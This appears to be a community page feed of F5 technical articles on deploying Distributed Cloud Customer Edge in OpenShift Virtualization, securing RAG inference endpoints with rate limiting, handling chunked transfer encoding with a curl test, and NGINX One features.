VirtualMachine Resources: Apply manifests to deploy XC CE instances in OpenShift. Network Configuration Setting up the network involves creating Open vSwitch (OVS) bridges and defining NetworkAttachmentDefinitions (NADs) to enable multiple network interfaces for the virtual machines. Open vSwitch (OVS) Bridges Create a NodeNetworkConfigurationPolicy to define OVS bridges on all worker nodes: apiVersion: nmstate.io/v1 kind: NodeNetworkConfigurationPolicy metadata: name: ovs-vms spec: nodeSelector: node-role.kubernetes.io/worker: '' desiredState: interfaces: - name: ovs-vms type: ovs-bridge state: up bridge: allow-extra-patch-ports: true options: stp: true port: - name: eno1 ovn: bridge-mappings: - localnet: ce2-slo bridge: ovs-vms state: present Replace eno1 with the appropriate physical network interface on your nodes. This policy sets up an OVS bridge named ovs-vms connected to the physical interface. NetworkAttachmentDefinitions (NADs) Define NADs using Multus CNI to attach networks to the virtual machines. External Network (ce2-slo): External Network (ce2-slo): Connects VMs to the physical network with a specific VLAN ID. This setup allows the VMs to communicate with external systems, services, or networks, which is essential for applications that require access to resources outside the cluster or need to expose services to external users. apiVersion: k8s.cni.cncf.io/v1 kind: NetworkAttachmentDefinition metadata: name: ce2-slo namespace: f5-ce spec: config: | { "cniVersion": "0.4.0", "name": "ce2-slo", "type": "ovn-k8s-cni-overlay", "topology": "localnet", "netAttachDefName": "f5-ce/ce2-slo", "mtu": 1500, "vlanID": 3052, "ipam": {} } Internal Network (ce2-sli): Internal Network (ce2-sli): Provides an isolated Layer 2 network for internal communication. By setting the topology to "layer2", this network operates as an internal overlay network that is not directly connected to the physical network infrastructure. The mtu is set to 1400 bytes to accommodate any overhead introduced by encapsulation protocols used in the internal network overlay. apiVersion: k8s.cni.cncf.io/v1 kind: NetworkAttachmentDefinition metadata: name: ce2-sli namespace: f5-ce spec: config: | { "cniVersion": "0.4.0", "name": "ce2-sli", "type": "ovn-k8s-cni-overlay", "topology": "layer2", "netAttachDefName": "f5-ce/ce2-sli", "mtu": 1400, "ipam": {} } VirtualMachine Configuration Configuring the virtual machine involves preparing the image, creating cloud-init user data, and defining the VirtualMachine resource. Image Preparation Obtain XC CE Image: Download the qcow2 image from the F5 Distributed Cloud Console. Generate Node Token: Acquire a one-time node token for node registration. Cloud-Init User Data Create a user-data configuration containing the node token and network settings: #cloud-config write_files: - path: /etc/vpm/user_data content: | token: <your-node-token> slo_ip: <IP>/<prefix> slo_gateway: <Gateway IP> slo_dns: <DNS IP> owner: root permissions: '0644' Replace placeholders with actual network configurations. This file automates the VM's initial setup and registration. VirtualMachine Resource Definition Define the VirtualMachine resource, specifying CPU, memory, disks, network interfaces, and cloud-init configurations. Resources: Allocate sufficient CPU and memory. Disks: Reference the DataVolume containing the XC CE image. Interfaces: Attach NADs for network connectivity. Cloud-Init: Embed the user data for automatic configuration. Conclusion Deploying F5 Distributed Cloud CE in OpenShift Virtualization enables organizations to leverage advanced networking and security features within their existing Kubernetes infrastructure. This integration facilitates a more secure, efficient, and scalable environment for modern applications. For detailed deployment instructions and configuration examples, please refer to the attached PDF guide. Related Articles: BIG-IP VE in Red Hat OpenShift Virtualization VMware to Red Hat OpenShift Virtualization Migration OpenShift Virtualization861Views2likes2CommentsSecure AI RAG using F5 Distributed Cloud in Red Hat OpenShift AI and NetApp ONTAP Environment
Introduction Retrieval Augmented Generation (RAG) is a powerful technique that allows Large Language Models (LLMs) to access information beyond their training data. The “R” in RAG refers to the data retrieval process, where the system retrieves relevant information from an external knowledge base based on the input query. Next, the “A” in RAG represents the augmentation of context enrichment, as the system combines the retrieved relevant information and the input query to create a more comprehensive prompt for the LLM. Lastly, the “G” in RAG stands for response generation, where the LLM generates a response with a more contextually accurate output based on the augmented prompt as a result. RAG is becoming increasingly popular in enterprise AI applications due to its ability to provide more accurate and contextually relevant responses to a wide range of queries. However, deploying RAG can introduce complexity due to its components being located in different environments. For instance, the datastore or corpus, which is a collection of data, is typically on-premise for enhanced control over data access and management due to data security, governance, and compliance with regulations within the enterprise. Meanwhile, inference services are often deployed in the cloud for their scalability and cost-effectiveness. In this article, we will discuss how F5 Distributed Cloud can simplify the complexity and securely connect all RAG components seamlessly for enterprise RAG-enabled AI applications deployments. Specifically, we will focus on Network Connect, App Connect, and Web App & API Protection. We will demonstrate how these F5 Distributed Cloud features can be leveraged to secure RAG in collaboration with Red Hat OpenShift AI and NetApp ONTAP. Example Topology F5 Distributed Cloud Network Connect F5 Distributed Cloud Network Connect enables seamless and secure network connectivity across hybrid and multicloud environments. By deploying F5 Distributed Cloud Customer Edge (CE) at site, it allows us to easily establish encrypted site-to-site connectivity across on-premises, multi-cloud, and edge environment. Jensen Huang, CEO of NVIDIA, has said that "Nearly half of the files in the world are stored on-prem on NetApp.”. In our example, enterprise data stores are deployed on NetApp ONTAP in a data center in Seattle managed by organization B (Segment-B: s-gorman-production-segment), while RAG services, including embedding Large Language Model (LLM) and vector database, is deployed on-premise on a Red Hat OpenShift cluster in a data center in California managed by Organization A (Segment-A: jy-ocp). By leveraging F5 Distributed Cloud Network Connect, we can quickly and easily establish a secure connection for seamless and efficient data transfer from the enterprise data stores to RAG services between these two segments only: F5 Distributed Cloud CE can be deployed as a virtual machine (VM) or as a pod on a Red Hat OpenShift cluster. In California, we deploy the CE as a VM using Red Hat OpenShift Virtualization — click here to find out more on Deploying F5 Distributed Cloud Customer Edge in Red Hat OpenShift Virtualization: Segment-A: jy-ocp on CE in California and Segment-B: s-gorman-production-segment on CE in Seattle: Simply and securely connect Segment-A: jy-ocp and Segment-B: s-gorman-production-segment only, using Segment Connector: NetApp ONTAP in Seattle has a LUN named “tbd-RAG”, which serves as the enterprise data store in our demo setup and contains a collection of data. After these two data centers are connected using F5 XC Network Connect, a secure encrypted end-to-end connection is established between them. In our example, “test-ai-tbd” is in the data center in California where it hosts the RAG services, including embedding Large Language Model (LLM) and vector database, and it can now successfully connect to the enterprise data stores on NetApp ONTAP in the data center in Seattle: F5 Distributed Cloud App Connect F5 Distributed Cloud App Connect securely connects and delivers distributed applications and services across hybrid and multicloud environments. By utilizing F5 Distributed Cloud App Connect, we can direct the inference traffic through F5 Distributed Cloud's security layers to safeguard our inference endpoints. Red Hat OpenShift on Amazon Web Services (ROSA) is a fully managed service that allows users to develop, run, and scale applications in a native AWS environment. We can host our inference service on ROSA so that we can leverage the scalability, cost-effectiveness, and numerous benefits of AWS’s managed infrastructure services. For instance, we can host our inference service on ROSA by deploying Ollama with multiple AI/ML models: Or, we can enable Model Serving on Red Hat OpenShift AI (RHOAI). Red Hat OpenShift AI (RHOAI) is a flexible and scalable AI/ML platform builds on the capabilities of Red Hat OpenShift that facilitates collaboration among data scientists, engineers, and app developers. This platform allows them to serve, build, train, deploy, test, and monitor AI/ML models and applications either on-premise or in the cloud, fostering efficient innovation within organizations. In our example, we use Red Hat OpenShift AI (RHOAI) Model Serving on ROSA for our inference service: Once inference service is deployed on ROSA, we can utilize F5 Distributed Cloud to secure our inference endpoint by steering the inference traffic through F5 Distributed Cloud's security layers, which offers an extensive suite of features designed specifically for the security of modern AI/ML inference endpoints. This setup would allow us to scrutinize requests, implement policies for detected threats, and protect sensitive datasets before they reach the inferencing service hosted within ROSA. In our example, we setup a F5 Distributed Cloud HTTP Load Balancer (rhoai-llm-serving.f5-demo.com), and we advertise it to the CE in the datacenter in California only: We now reach our Red Hat OpenShift AI (RHOAI) inference endpoint through F5 Distributed Cloud: F5 Distributed Cloud Web App & API Protection F5 Distributed Cloud Web App & API Protection provides comprehensive sets of security features, and uniform observability and policy enforcement to protect apps and APIs across hybrid and multicloud environments. We utilize F5 Distributed Cloud App Connect to steer the inference traffic through F5 Distributed Cloud to secure our inference endpoint. In our example, we protect our Red Hat OpenShift AI (RHOAI) inference endpoint by rate-limiting the access, so that we can ensure no single client would exhaust the inference service: A "Too Many Requests" is received in the response when a single client repeatedly requests access to the inference service at a rate higher than the configured threshold: This is just one of the many security features to protect our inference service. Click here to find out more on Securing Model Serving in Red Hat OpenShift AI (on ROSA) with F5 Distributed Cloud API Security. Demonstration In a real-world scenario, the front-end application could be hosted on the cloud, or hosted at the edge, or served through F5 Distributed Cloud, offering flexible alternatives for efficient application delivery based on user preferences and specific needs. To illustrate how all the discussed components work seamlessly together, we simplify our example by deploying Open WebUI as the front-end application on the Red Hat OpenShift cluster in the data center in California, which includes RAG services. While a DPU or GPU could be used for improved performance, our setup utilizes a CPU for inferencing tasks. We connect our app to our enterprise data stores deployed on NetApp ONTAP in the data center in Seattle using F5 Distributed Cloud Network Connect, where we have a copy of "Chapter 1. About the Migration Toolkit for Virtualization" from Red Hat. These documents are processed and saved to the Vector DB: Our embedding Large Language Model (LLM) is Sentence-Transformers/all-MiniLM-L6-v2, and here is our RAG template: Instead of connecting to the inference endpoint on Red Hat OpenShift AI (RHOAI) on ROSA directly, we connect to the F5 Distributed Cloud HTTP Load Balancer (rhoai-llm-serving.f5-demo.com) from F5 Distributed Cloud App Connect: Previously, we asked, "What is MTV?“ and we never received a response related to Red Hat Migration Toolkit for Virtualization: Now, let's try asking the same question again with RAG services enabled: We finally received the response we had anticipated. Next, we use F5 Distributed Cloud Web App & API Protection to safeguard our Red Hat OpenShift AI (RHOAI) inference endpoint on ROSA by rate-limiting the access, thus preventing a single client from exhausting the inference service: As expected, we received "Too Many Requests" in the response on our app upon requesting the inference service at a rate greater than the set threshold: With F5 Distributed Cloud's real-time observability and security analytics from the F5 Distributed Console, we can proactively monitor for potential threats. For example, if necessary, we can block a client from accessing the inference service by adding it to the Blocked Clients List: As expected, this specific client is now unable to access the inference service: Summary Deploying and securing RAG for enterprise RAG-enabled AI applications in a multi-vendor, hybrid, and multi-cloud environment can present complex challenges. In collaboration with Red Hat OpenShift AI (RHOAI) and NetApp ONTAP, F5 Distributed Cloud provides an effortless solution that secures RAG components seamlessly for enterprise RAG-enabled AI applications.362Views1like0CommentsF5 Distributed Cloud and Transfer Encoding: Chunking
My team recently came across an unusual request from an F5 Distributed Cloud customer: How do we support HTTP/API clients that can only support transfer encoding chunked requests. What even is chunking? What is Transfer Encoding? The key word is "encoding" and HTTP uses a header to communicate what scheme encodes the data in a message body. These can be used for functional purposes as well as communication optimization. In the case of Transfer Encoding it is most commonly leveraged for chunking, which is taking a large bit of data and breaking it up into smaller pieces that are sent between two nodes along a path, transparently to the application sending/receiving messages. These nodes may not necessarily be the source and destination of an HTTP conversation, so proxies in between could transparently reassemble the chunks for differing parts of the path. It does not use a content-length header: Contrasting with Content Encoding, which is more commonly used for compression of message bodies (although this can be done with transfer encoding too) and requires the length to be defined. Proxies along the path are expected to not change these values, but this is not always the case. In our customer scenario, the request was exactly for the proxy (in this case Distributed Cloud) to support chunked requests from the client to an HTTP 2 server (HTTP2 does away with chunking completely). With Distributed Cloud, we fulfill this with three simple config elements: 1. The HTTP Load Balancer Object is configured to be an HTTP 1.1 virtual server: 2. The Origin is configured to use HTTP 2 (which defines Distributed Cloud's behavior as an HTTP client): And after applying the config, we go back to the HTTP Load Balancer dialog, to the Other Settings section and configure a Buffer Policy under Miscellaneous Options: A value configured in that dialog (it is the only property aside from an enable checkbox) will limit the request size to the specified value in bytes, but it has the added benefit of allowing the Distributed Cloud proxy to buffer the chunked requests and then convert them into content-encoding friendly values with length specified, and then send to the server via an HTTP 2 connection. To test this connection, a simple cURL command with the header "Transfer-Encoding: chunked" and the -v flag can validate your config. ex. curl -v --location 'https:/[URL/PATH]:PORT --header 'Transfer-Encoding: chunked' --data ‘’ In the ensuing response, the -v flag (verbose) will include the following in the response: * using HTTP/1.x > POST [PATH] HTTP/1.1 > Host: [URL] > User-Agent: curl/8.7.1 … > Transfer-Encoding: chunked … Note the Transfer-Encoding chunked line, which shows that chunking was used on the client-side connection. You can validate the server-side connection in the request logs in the Distributed Cloud dashboard by looking at the request headers specified in the event JSON: "rsp_headers": "{\":status\":\"200\",\"connection\":\"close\",\"content-length\":\"26930\", [TRUNCATED] This is a transfer-encoded chunked client-side request being converted to a content-encoded request on the server side: Special shoutout to fellow F5er Gowry Bhaagavathula for collaborating with me on getting this figured out!443Views1like0CommentsHow I did it - “Delivering Kasm Workspaces three ways”
Securing modern, containerized platforms like Kasm Workspaces requires a robust and multi-faceted approach to ensure performance, reliability, and data protection. In this edition of "How I did it" we'll see how F5 technologies can enhance the security and scalability of Kasm Workspaces deployments.585Views2likes0CommentsExperience the power of F5 NGINX One with feature demos
Introduction Introducing F5 NGINX One, a comprehensive solution designed to enhance business operations significantly through improved reliability and performance. At the core of NGINX One is our data plane, which is built on our world-class, lightweight, and high-performance NGINX software. This foundation provides robust traffic management solutions that are essential for modern digital businesses. These solutions include API Gateway, Content Caching, Load Balancing, and Policy Enforcement. NGINX One includes a user-friendly, SaaS-based NGINX One Console that provides essential telemetry and overseas operations without requiring custom development or infrastructure changes. This visibility empowers teams to promptly address customer experience, security vulnerabilities, network performance, and compliance concerns. NGINX One's deployment across various environments empowers businesses to enhance their operations with improved reliability and performance. It is a versatile tool for strengthening operational efficiency, security posture, and overall digital experience. le: Simplifying Application Delivery and Management NGINX One has several promising features on the horizon. Let's highlight three key features: Monitor Certificates and CVEs, Editing and Update Configurations, and Config Sync Groups. Let's delve into these in details. Monitor Certificates and CVE’s: One of NGINX One's standout features is its ability to monitor Common Vulnerabilities and Exposures (CVEs) and Certificate status. This functionality is crucial for maintaining application security integrity in a continually evolving threat landscape. The CVE and Certificate Monitoring capability of NGINX One enables teams to: Prioritize Remediation Efforts: With an accurate and up-to-date database of CVEs and a comprehensive certificate monitoring system, NGINX One assists teams in prioritizing vulnerabilities and certificate issues according to their severity, guaranteeing that essential security concerns are addressed without delay. Maintain Compliance: Continuous monitoring for CVEs and certificates ensures that applications comply with security standards and regulations, crucial for industries subject to stringent compliance mandates. Edit and Update Configurations: This feature empowers users to efficiently edit configurations and perform updates directly within the NGINX One Console interface. With Configuration Editing, you can: Make Configuration Changes: Quickly adapt to changing application demands by modifying configurations, ensuring optimal performance and security. Simplify Management: Eliminate the need to SSH directly into each instance to edit or update configurations. Reduce Errors: The intuitive interface minimizes potential errors in configuration changes, enhancing reliability by offering helpful recommendations. Enhance Automation with NGINX One SaaS Console: Integrates seamlessly into CI/CD and GitOps workflows, including GitHub, through a comprehensive set of APIs. Config Sync Groups: The Config Sync Group feature is invaluable for environments running multiple NGINX instances. This feature ensures consistent configurations across all instances, enhancing application reliability and reducing administrative overhead. The Config Sync Group capability offers: Automated Synchronization: Configurations are seamlessly synchronized across NGINX instances, guaranteeing that all applications operate with the most current and secure settings. When a configuration sync group already has a defined configuration, it will be automatically pushed to instances as they join. Scalability Support: Organizations can easily incorporate new NGINX instances without compromising configuration integrity as their infrastructure expands. Minimized Configuration Drift: This feature is crucial for maintaining consistency across environments and preventing potential application errors or vulnerabilities from configuration discrepancies. Conclusion NGINX One Cloud Console redefines digital monitoring and management by combining all the NGINX core capabilities and use cases. This all-encompassing platform is equipped with sophisticated features to simplify user interaction, drastically cut operational overhead and expenses, bolster security protocols, and broaden operational adaptability. Read our announcement blog for more details on the launch. To explore the platform’s capabilities and see it in action, we invite you to tune in to our webinar on September 25th. This is a great opportunity to witness firsthand how NGINX One can revolutionize your digital monitoring and management strategies.879Views4likes1CommentHow I Did it - Migrating Applications to Nutanix NC2 with F5 Distributed Cloud Secure Multicloud Networking
In this edition of "How I Did it", we will explore how F5 Distributed Cloud Services (XC) enables seamless application extension and migration from an on-premises environment to Nutanix NC2 clusters.1KViews4likes0Comments